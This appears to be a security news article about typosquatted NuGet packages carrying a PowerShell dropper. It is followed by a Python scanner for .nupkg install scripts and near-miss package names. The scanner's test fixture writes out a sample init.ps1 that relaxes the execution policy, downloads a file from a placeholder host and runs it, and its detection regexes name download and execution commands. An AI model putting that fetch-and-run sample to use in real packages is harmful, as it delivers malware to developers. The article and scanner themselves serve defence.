There is a concerning trend among cybercriminals targeting individuals working with the .NET framework using a sneaky tactic called typosquatting.
This involves creating fake packages that mimic the names of legitimate software and distributing them through the popular NuGet repository.
Cybersecurity researchers Natan Nehorai and Brian Moussalli from JFrog have detected this ongoing campaign involving malicious software distribution through fraudulent packages.
In just one month, three of these packages have been downloaded more than 150,000 times. The extensive downloads of malicious NuGet packages could indicate many compromised systems among .NET developers.
However, it is also possible that the cybercriminals behind this attack deliberately sought to legitimize their fake packages by artificially inflating download numbers.
By creating fake profiles on the NuGet repository that mimicked the names of Microsoft software developers who work on the NuGet .NET package manager, the attackers attempted to deceive users into thinking that the packages were legitimate.
Malicious Packages Discovered
Experts have identified a number of NuGet packages that all carry the same malicious payload.
The malicious packages distributed through the NuGet repository contain a PowerShell-based dropper script called init.ps1, which downloads a payload and executes it on the targeted machine.
Once the script is executed, it configures the infected system to allow PowerShell execution without any restrictions, effectively granting the attackers unrestricted access to the system.
After executing the PowerShell-based dropper script, the malicious packages download and launch a second-stage payload. This payload is a custom-built Windows executable designed specifically for this attack.
The malware that is deployed on compromised systems is capable of carrying out various malicious activities.
Spotting Malicious NuGet Packages
The key points are listed below:
- A developer’s first responsibility is to make sure they never import or install a package whose name is a typo or look-alike of the one they actually meant.
- Some packages imitate the names of established, reputable packages in the hope that a developer will unintentionally add them to a project or list them as a dependency.
- Users can also protect themselves from installing potentially harmful packages by carefully inspecting the installation and initialization scripts for any suspicious code or activity.
- Watch for scripts that retrieve and execute resources from external sources when they run.
- Ensure no scripts or binary files are executed unintentionally when the package is downloaded locally.
- A low download count on a relatively new package may indicate a risk.
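The two checks above that a developer can actually automate are reading a package's install-time scripts for fetch-and-execute behaviour (the init.ps1 dropper pattern described earlier) and comparing a package id against the names it might be impersonating. The script below is an added example, not code from the article or from JFrog: it unpacks a .nupkg (a zip archive), reads the PowerShell scripts NuGet can run from its tools/ folder, flags the indicator patterns the article describes, and applies an edit-distance check to spot near-miss package ids. The two sample packages, the placeholder URL and the list of "known" package ids are all constructed for the example; the regular expressions are heuristics, not a complete signature set.

```python
"""Static triage of a NuGet package (.nupkg) for the warning signs listed above.

A .nupkg is a zip archive; the PowerShell scripts NuGet can execute on install
live under tools/ (init.ps1, install.ps1, uninstall.ps1), so they are the first
thing to read before a package is trusted. Both sample packages below are
constructed for this example and stand in for no real package.
"""
import io
import re
import zipfile

# Script file names NuGet can run from the tools/ folder.
SCRIPT_NAMES = ("init.ps1", "install.ps1", "uninstall.ps1")

# Heuristic indicators: fetching resources from an external source, executing
# what was fetched, loosening the execution policy, or hiding commands in base64.
INDICATORS = {
    "remote_fetch": re.compile(
        r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadString|DownloadFile|Net\.WebClient", re.I),
    "dynamic_exec": re.compile(
        r"Invoke-Expression|\biex\b|Start-Process|Assembly\]::Load", re.I),
    "policy_change": re.compile(r"Set-ExecutionPolicy\s+(Unrestricted|Bypass)", re.I),
    "encoded_cmd": re.compile(r"-(EncodedCommand|enc)\b|FromBase64String", re.I),
}


def scan_nupkg(data: bytes) -> dict:
    """Map each tools/ script in the archive to the sorted indicator names it matches."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            low = name.lower()
            if low.startswith("tools/") and low.rsplit("/", 1)[-1] in SCRIPT_NAMES:
                text = zf.read(name).decode("utf-8", errors="replace")
                report[name] = sorted(k for k, rx in INDICATORS.items() if rx.search(text))
    return report


def edit_distance(a: str, b: str) -> int:
    """Damerau-Levenshtein distance (substitution, insertion, deletion, adjacent swap)."""
    a, b = a.lower(), b.lower()
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def typosquat_candidates(package_id: str, known_ids, max_distance: int = 2) -> list:
    """Known ids that package_id is a near-miss of (close to, but not identical with)."""
    return sorted(k for k in known_ids
                  if k.lower() != package_id.lower()
                  and edit_distance(package_id, k) <= max_distance)


def build_nupkg(files: dict) -> bytes:
    """Build an in-memory .nupkg (zip) from {path: text}; used only for the samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for path, text in files.items():
            zf.writestr(path, text)
    return buf.getvalue()


# Constructed sample 1: an init script showing the behaviour the article describes
# (relax the execution policy, fetch a file from outside, run it). The URL is a
# placeholder for the example, not an indicator from the real campaign.
SUSPICIOUS_PKG = build_nupkg({
    "Example.Pkg.nuspec": "<package/>",
    "tools/init.ps1": (
        "Set-ExecutionPolicy Unrestricted -Scope Process -Force\n"
        "Invoke-WebRequest -Uri 'http://example.invalid/stage2' -OutFile $env:TEMP\\s.exe\n"
        "Start-Process $env:TEMP\\s.exe\n"
    ),
})

# Constructed sample 2: a benign init script that only loads the package's own module.
BENIGN_PKG = build_nupkg({
    "Example.Lib.nuspec": "<package/>",
    "tools/init.ps1": "param($installPath)\nImport-Module (Join-Path $installPath 'tools\\Example.psm1')\n",
})

# Constructed list of legitimate ids a project already depends on (assumed, for the example).
KNOWN_IDS = ["Newtonsoft.Json", "Serilog", "AutoMapper", "Dapper"]


if __name__ == "__main__":
    print(scan_nupkg(SUSPICIOUS_PKG))  # {'tools/init.ps1': ['dynamic_exec', 'policy_change', 'remote_fetch']}
    print(scan_nupkg(BENIGN_PKG))      # {'tools/init.ps1': []}
    print(typosquat_candidates("Newtonsft.Json", KNOWN_IDS))  # ['Newtonsoft.Json']
    print(typosquat_candidates("Serilog", KNOWN_IDS))         # []
```

In practice the scan would run over the real .nupkg file (read its bytes and pass them to scan_nupkg) before the package is restored, and the known-id list would come from the project's existing packages.config or PackageReference entries; a non-empty typosquat_candidates result for a freshly added dependency is the moment to double-check the spelling against the package page.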
The current attack is just one aspect of a wider-ranging, malicious campaign. This campaign involves multiple attackers who have taken the bold step of uploading over 144,000 packages related to phishing onto various open-source package repositories.